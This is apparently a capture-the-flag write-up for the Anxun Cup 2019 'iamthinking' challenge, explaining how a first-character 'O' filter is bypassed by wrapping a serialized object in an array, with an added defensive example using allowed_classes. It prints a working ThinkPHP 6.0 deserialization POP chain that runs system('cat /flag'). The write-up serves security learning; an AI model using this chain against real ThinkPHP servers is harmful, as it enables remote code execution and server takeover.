
[Anxun Cup 2019] iamthinking

2022-06-22 11:58:00 nigo134

Key concept:

ThinkPHP 6.0 deserialization vulnerability

Solution:

On first visiting the site I got a Forbidden response, so I ran a directory scan.

The scan found www.zip. Download it and start auditing the code:

It is a simple index.php controller. Roughly, the code deserializes the payload parameter passed in via GET, but the payload cannot start with O. That clearly points to a deserialization vulnerability. O is the first character of a serialized PHP object; since the payload cannot start with O, put the object inside an array so that the serialized string starts with a, which bypasses the check. The next step is to find a POP chain, so first check whether ThinkPHP 6.0 has a known deserialization vulnerability.
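Why a first-character check does not stop object instantiation, and what does, shown as an added example that is not part of the challenge source: the `Probe` class, `weakFilter()` and `safeUnserialize()` are hypothetical names, and the exact form of the challenge's check is assumed to be a simple prefix match.

```php
<?php
// Added example. Probe, weakFilter and safeUnserialize are hypothetical names;
// the prefix regex is an assumed form of the check described in the write-up.

// Stand-in for any application class whose magic method could start a POP chain.
class Probe
{
    public static $fired = 0;
    public function __destruct() { self::$fired++; }
}

// Weak filter: accept anything whose first byte is not "O".
function weakFilter(string $s): bool
{
    return !preg_match('/^O/', $s);
}

// Hardened handling: never build application objects from untrusted input.
// With allowed_classes => false every object becomes __PHP_Incomplete_Class,
// so no __wakeup or __destruct of application classes runs.
function safeUnserialize(string $s)
{
    return unserialize($s, ['allowed_classes' => false]);
}

// Constructed sample inputs: a bare object and the same object inside an array.
$bare    = 'O:5:"Probe":0:{}';
$wrapped = 'a:1:{i:0;O:5:"Probe":0:{}}';

// The filter rejects the bare object but accepts the array-wrapped one.
var_dump(weakFilter($bare), weakFilter($wrapped));

// Plain unserialize on the accepted input still builds the nested Probe,
// and its destructor fires when the value is released.
$v = unserialize($wrapped);
unset($v);
echo "destructor calls after plain unserialize: ", Probe::$fired, "\n";

// The hardened path on the same input never creates a Probe instance,
// so the destructor counter does not change.
$v = safeUnserialize($wrapped);
echo "class of nested value: ", get_class($v[0]), "\n";
unset($v);
echo "destructor calls after safe unserialize: ", Probe::$fired, "\n";
```

Where the endpoint only needs scalars and arrays, `json_decode()` removes the object-instantiation path entirely.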

ThinkPHP 6.0 does happen to have a deserialization vulnerability, and an exp is easy to find online:

<?php

namespace think\model\concern;

trait Attribute
{
    private $data = ["key" => ["key1" => "cat /flag"]];
    private $withAttr = ["key"=>["key1"=>"system"]];
    protected $json = ["key"];
}
namespace think;

abstract class Model
{
    use model\concern\Attribute;
    private $lazySave;
    protected $withEvent;
    private $exists;
    private $force;
    protected $table;
    protected $jsonAssoc;
    function __construct($obj = '')
    {
        $this->lazySave = true;
        $this->withEvent = false;
        $this->exists = true;
        $this->force = true;
        $this->table = $obj;
        $this->jsonAssoc = true;
    }
}

namespace think\model;

use think\Model;

class Pivot extends Model
{
}
$a = new Pivot();
$b = new Pivot($a);
$c = array($b);
echo urlencode(serialize($c));

Get the flag:


Copyright notice
This article was created by [nigo134]. Please include the original link when reposting. Thank you.
https://yzsam.com/2022/173/202206221126293773.html